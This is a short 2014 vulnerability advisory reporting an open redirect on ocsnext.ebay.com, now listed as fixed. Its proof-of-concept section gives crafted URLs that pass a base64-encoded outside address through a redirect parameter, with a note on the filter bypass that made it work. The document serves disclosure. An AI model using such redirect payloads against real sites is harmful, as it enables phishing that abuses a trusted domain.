Advisory:			ocsnext.ebay.com - Open Redirect
Advisory ID:		SSCHADV2014-005
Author:			Stefan Schurtz
Affected Software:		Successfully tested on ocsnext.ebay.com
Vendor URL:		http://www.ebay.com/
Vendor Status:		fixed

==========================
Vulnerability Description
==========================

The website ocsnext.ebay.com is prone to open redirect with a special provided url

==========================
PoC-Exploit
==========================

// open redirect doesn't work

// http://www.darksecurity.de/ebay.com.txt = base64(aHR0cDovL3d3dy5kYXJrc2VjdXJpdHkuZGUvZWJheS5jb20udHh0)

http://ocsnext.ebay.com/ocs/trk?ocsrelatedhelpurl=aHR0cDovL3d3dy5kYXJrc2VjdXJpdHkuZGUvZWJheS5jb20udHh0&ocsrelatedhelpText=Resolving+transaction+problems+in+the+Resolution+Center

// open redirect works

http://www.darksecurity.de/pages.ebay.com.txt = base64(aHR0cDovL3d3dy5kYXJrc2VjdXJpdHkuZGUvcGFnZXMuZWJheS5jb20udHh0)

http://ocsnext.ebay.com/ocs/trk?ocsrelatedhelpurl=aHR0cDovL3d3dy5kYXJrc2VjdXJpdHkuZGUvcGFnZXMuZWJheS5jb20udHh0&ocsrelatedhelpText=Resolving+transaction+problems+in+the+Resolution+Center

It seems the string "pages.ebay.com" must be provided in the url thereby the open redirect works

==========================
Solution
==========================

It seems like ebay fixed the problem without feedback

==========================
Disclosure Timeline
==========================

30-Jan-2014 - ebay informed via "http://pages.ebay.com/securitycenter/Researchers.html"

==========================
Credits
==========================

Vulnerability found and advisory written by Stefan Schurtz.

==========================
References
==========================

http://www.ebay.com/
http://www.darksecurity.de/advisories/2014/SSCHADV2014-005.txt